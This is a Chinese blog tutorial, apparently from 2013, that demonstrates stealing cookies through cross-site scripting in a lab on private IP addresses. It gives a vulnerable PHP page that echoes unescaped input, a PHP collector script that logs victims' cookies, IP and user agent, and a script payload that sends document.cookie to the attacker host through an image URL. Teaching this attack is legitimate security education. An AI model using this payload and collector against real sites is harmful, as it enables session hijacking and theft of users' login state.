注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

碳基体

http://weibo.com/tanjiti

 
 
 
 
 

日志

 
 

利用xss盗取cookie的简单实例  

2013-04-18 14:58:25|  分类: web app security |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
试验环境
攻击机器  10.1.36.181 stealcookies.php cookie.txt
受害服务器 10.1.36.34 victim.php victim.html


(1)受害者有xss漏洞的脚本victim.php (问题字段用红色标明)

<?php
session_start();

session_regenerate_id();
echo session_id()."<br/>";

if(isset($_POST["login"]))
{
echo "Hello " .$_POST["name"]."<br/>";
}
?>

(2)对应表单victim.html

<html>
<body>
<form id ="form1" name="form1" method="post" action="victim.php">
<label>Name
<input name="name" type="text" id="name"/>
</label>
<input name="login" type="submit" id="login" value="submit"/>
</form>
</body>
</html>



正常流程
  简单的利用xss盗取cookie实例 - 碳基体 - 碳基体简单的利用xss盗取cookie实例 - 碳基体 - 碳基体


(3)攻击者盗取cookie的脚本stealcookies.php

<?php
$ua = $_SERVER["HTTP_USER_AGENT"];
$client_ip = $_SERVER["REMOTE_ADDR"];
$method = $_SERVER["REQUEST_METHOD"];
$referer = $_SERVER["HTTP_REFERER"];
$date = date("F j, Y, g:i a");
$querystring = $_SERVER["QUERY_STRING"];
$log = fopen("cookie.txt","a+");
$str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date | Cookie: $querystring \n";
fwrite($log,$str);
?>

脚本运行的前提条件,在stealcookies.php同一根目录下,有一个有写权限的文件cookie.txt

攻击流程
 在 http://10.1.36.34/victim.html的表单中提交以下语句

<script>document.write('<img src="http://10.1.36.181/stealcookies.php?a=' + encodeURI(document.cookie) + '"/>')</script>

js的意思是生成一个包含攻击者url的图片
简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

接着我们可以看到访问该页面用户的cookie写入到了攻击者的cookie.txt文件里

查看攻击者10.1.36.181上的cookie.txt文件

cat cookie.txt

简单的利用xss盗取cookie实例 - 碳基体 - 碳基体
 
可以看到收到cookie了。

 
  评论这张
 
阅读(1937)| 评论(1)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017